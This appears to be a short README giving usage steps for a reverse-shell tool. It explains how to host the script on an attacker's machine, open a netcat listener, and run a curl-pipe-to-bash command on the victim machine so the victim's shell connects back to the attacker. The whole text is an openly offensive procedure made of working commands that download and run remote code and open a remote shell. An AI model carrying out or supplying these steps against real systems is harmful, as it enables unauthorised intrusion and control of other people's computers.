- Download rshells.sh on the attacker's machine:
wget https://raw.githubusercontent.com/dherrera98/AutoReverseShell/main/rshells.sh
- Serve it with a web server, for example:
python3 -m http.server 80
- Run netcat in another terminal to listen on some port, for example port 443:
nc -nlvp 443
- On the victim machine run:
curl http://<IpWebServer>:<PortWebServer>/rshell.sh | bash -s <AttackerIP> <NetcatPort>
- Look at the netcat terminal and you will see the shell of the victim.